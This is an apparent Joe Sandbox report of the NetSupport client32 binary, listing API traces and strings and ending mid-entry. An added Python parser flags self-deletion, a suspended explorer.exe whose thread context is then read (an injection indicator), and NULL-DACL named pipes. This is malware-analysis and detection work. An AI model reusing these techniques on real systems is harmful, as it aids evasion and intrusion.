                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 11127400
                                                                                  • _memset.LIBCMT ref: 1112741D
                                                                                  • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                                  • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                                  • _strrchr.LIBCMT ref: 111274AA
                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
                                                                                  • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                                  • wsprintfA.USER32 ref: 11127561
                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
                                                                                  • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
                                                                                  • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                                  • _strrchr.LIBCMT ref: 111276AB
                                                                                  • _memmove.LIBCMT ref: 11127724
                                                                                  • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                                  • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                  • API String ID: 2219718054-800295887
                                                                                  • Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                  • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                                  • Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                  • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
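The trace above (strings NSelfDel.exe, selfdelete.cpp and the format "%s" %d %s) shows the client32 self-delete routine: it writes a 0x4D0-byte helper into the temp directory, starts it with its own path and PID, and separately starts explorer.exe with dwCreationFlags 0x44 (CREATE_SUSPENDED | IDLE_PRIORITY_CLASS) before calling GetThreadContext on it. The following is an added example, not part of the Joe Sandbox report and not NetSupport code: a small parser for the API trace lines in the form this report prints them, with three rules that flag the self-delete helper launch, the suspended-process-plus-thread-context pattern, and (from the platnt.cpp block later in this report) a named pipe created after SetSecurityDescriptorDacl with bDaclPresent TRUE and pDacl NULL, which grants every principal full access. The sample traces are copied from this report; the rule names, the CREATE_SUSPENDED constant and the stack-slot positions used for dwCreationFlags and the DACL arguments are my assumptions about the report's argument listing, which prints raw stack slots rather than named parameters.

```python
# Added example: parser and three rules for Joe Sandbox per-function API traces.
# Not part of the report and not NetSupport code; the sample lines are copied
# from the client32 traces in this report (selfdelete.cpp and platnt.cpp blocks).
import re
from dataclasses import dataclass
from typing import Optional

# One trace line: optional "Part of subcall function X:", then Api.MODULE, optional
# "(slot,slot,...)" as Joe Sandbox prints the stack, then "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
CREATE_SUSPENDED = 0x4  # dwCreationFlags bit (winbase.h)

@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple             # stack slots; only the leading ones are formal parameters
    ref: str
    subcall: Optional[str]  # callee address when the line came from a subcall

def parse_trace(text: str) -> list:
    """One Call per recognised trace line; other report lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            raw = m.group("args") or ""
            args = tuple(a.strip() for a in raw.split(",")) if raw else ()
            calls.append(Call(m.group("api"), m.group("module").upper(), args,
                              m.group("ref").upper(), m.group("sub")))
    return calls

def _hex(slot: str) -> Optional[int]:
    """Numeric slots are printed as hex; '?' and string slots are not numbers."""
    try:
        return int(slot, 16)
    except ValueError:
        return None

def find_self_delete_helper(calls) -> Optional[str]:
    """CreateProcess after WriteFile and GetCurrentProcessId in one function (NSelfDel pattern)."""
    wrote = got_pid = False
    for c in calls:
        if c.subcall:
            continue
        wrote |= c.api == "WriteFile"
        got_pid |= c.api == "GetCurrentProcessId"
        if c.api in ("CreateProcessA", "CreateProcessW") and wrote and got_pid:
            return c.ref
    return None

def find_suspended_then_context(calls):
    """(create ref, target, GetThreadContext ref) for CREATE_SUSPENDED in slot 6 then a context read."""
    created = target = None
    for c in calls:
        if c.subcall:
            continue
        if c.api in ("CreateProcessA", "CreateProcessW") and len(c.args) > 5:
            flags = _hex(c.args[5])
            if flags is not None and flags & CREATE_SUSPENDED:
                created = c.ref
                target = c.args[1] if c.args[1] != "00000000" else c.args[0]
        elif c.api == "GetThreadContext" and created:
            return created, target, c.ref
    return None

def find_null_dacl_pipe(calls) -> Optional[str]:
    """CreateNamedPipe after SetSecurityDescriptorDacl(pSD, TRUE, NULL, ..): everyone gets full access."""
    null_dacl = False
    for c in calls:
        if c.subcall:
            continue
        if c.api == "SetSecurityDescriptorDacl" and len(c.args) >= 3:
            null_dacl = _hex(c.args[1]) == 1 and _hex(c.args[2]) == 0
        elif c.api in ("CreateNamedPipeA", "CreateNamedPipeW") and null_dacl:
            return c.ref
    return None

def analyze(text: str) -> list:
    """All rules over one function's trace, returned as short findings."""
    calls, out = parse_trace(text), []
    if (r := find_self_delete_helper(calls)):
        out.append(f"self-delete helper started at {r}")
    if (hit := find_suspended_then_context(calls)):
        out.append(f"suspended {hit[1]} created at {hit[0]}, thread context read at {hit[2]}")
    if (r := find_null_dacl_pipe(calls)):
        out.append(f"named pipe with NULL DACL created at {r}")
    return out

SELF_DELETE_TRACE = """\
• WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
• wsprintfA.USER32 ref: 11127561
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
• CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
• GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
"""
NAMED_PIPE_TRACE = """\
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
• CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
"""
```

Lines marked "Part of subcall function" are skipped by the rules on purpose: the sandbox lists them under every caller, so matching on them would attribute the callee's behaviour (here the Client32 MessageBoxA/ExitProcess error handler) to each function that happens to call it. The slot positions are only trustworthy for the leading arguments; the trailing "?" and repeated 00000000 entries are whatever was on the stack at the call.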
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11147195
                                                                                  • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 111471C6
                                                                                  • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 111471D4
                                                                                  • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 111471E2
                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 11147233
                                                                                  • GetTickCount.KERNEL32 ref: 111472A0
                                                                                  • GetTickCount.KERNEL32 ref: 111472C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                  • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                  • API String ID: 132346978-2450594007
                                                                                  • Opcode ID: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                  • Instruction ID: 7595ca438a49fe2cfed1e9b9138c1f844f941fc746b3e2b3d1353ee5cc6e5023
                                                                                  • Opcode Fuzzy Hash: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                  • Instruction Fuzzy Hash: 3F917A75A012289FDB28CF64C894ADAFBB4EF49318F5581E9E94D97301DB309E80CF91
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 11123836
                                                                                  • FreeLibrary.KERNEL32(?,?,?), ref: 1112387B
                                                                                  • IsIconic.USER32(?), ref: 111238C4
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 11123931
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Iconic$FreeInvalidateLibraryRect
                                                                                  • String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
                                                                                  • API String ID: 2857465220-3401310001
                                                                                  • Opcode ID: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                  • Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
                                                                                  • Opcode Fuzzy Hash: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                  • Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 110CB7D9
                                                                                  • IsIconic.USER32(00000001), ref: 110CB7E9
                                                                                  • GetClientRect.USER32(00000001,?), ref: 110CB7F8
                                                                                  • GetSystemMetrics.USER32(00000000), ref: 110CB80D
                                                                                  • GetSystemMetrics.USER32(00000001), ref: 110CB814
                                                                                  • IsIconic.USER32(00000001), ref: 110CB844
                                                                                  • GetWindowRect.USER32(00000001,?), ref: 110CB853
                                                                                  • SetWindowPos.USER32(?,00000000,?,11186ABB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB907
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                  • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                  • API String ID: 2655531791-1552842965
                                                                                  • Opcode ID: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                  • Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
                                                                                  • Opcode Fuzzy Hash: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                  • Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90
                                                                                  APIs
                                                                                  • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
                                                                                  • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
                                                                                  • GetLastError.KERNEL32 ref: 110F3820
                                                                                  • Sleep.KERNEL32(000003E8), ref: 110F383F
                                                                                  • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
                                                                                  • LocalFree.KERNEL32(?), ref: 110F386F
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • CreateNamedPipe %s failed, error %d, xrefs: 110F3828
                                                                                  • pSD, xrefs: 110F37C5
                                                                                  • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F37C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                  • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                  • API String ID: 3134831419-838605531
                                                                                  • Opcode ID: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                  • Instruction ID: 0e8d2fcc7f1c5a3ddbef900f79df2a7d8f3873558929e31ad043a2fe9730b339
                                                                                  • Opcode Fuzzy Hash: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                  • Instruction Fuzzy Hash: D721AA71E80329BBE7119BA4CC8AFEEB76CDB44729F004211FE356B1C0D6B05A058795
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                  • API String ID: 0-293745777
                                                                                  • Opcode ID: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                                  • Instruction ID: 04be3a73864f79ea4ff0060164bd048450722a5e4ebb998c6abac99bf16b3135
                                                                                  • Opcode Fuzzy Hash: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                                  • Instruction Fuzzy Hash: FFA1B43AF142059FD714DB65DC91FAAF3A4EF98305F104199EA8A9B380DB71B901CB91
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
                                                                                  • FindWindowA.USER32(NSMClassList,00000000), ref: 110934EA
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 110934F1
                                                                                    • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982
                                                                                    • Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                    • Part of subcall function 11091A50: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 11091A9D
                                                                                    • Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
                                                                                    • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
                                                                                    • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                    • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
                                                                                    • Part of subcall function 11091B00: DispatchMessageA.USER32(?), ref: 11091B5B
                                                                                    • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555
                                                                                    • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                  • String ID: NSMClassList$NSMFindClassEvent
                                                                                  • API String ID: 1622498684-2883797795
                                                                                  • Opcode ID: 29ecc446f54fe485b0921c68df6d4683565cdf60394698646c335648b9e5d1e1
                                                                                  • Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
                                                                                  • Opcode Fuzzy Hash: 29ecc446f54fe485b0921c68df6d4683565cdf60394698646c335648b9e5d1e1
                                                                                  • Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5
                                                                                  APIs
                                                                                  • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                                  • GetClipboardData.USER32(?), ref: 1103337D
                                                                                  • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                                  • GetLastError.KERNEL32 ref: 11033406
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                  • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                  • API String ID: 1861668072-1296821031
                                                                                  • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                  • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                                  • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                  • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
                                                                                  • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                                  • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLock
                                                                                  • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                  • API String ID: 2752051264-327499879
                                                                                  • Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                  • Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
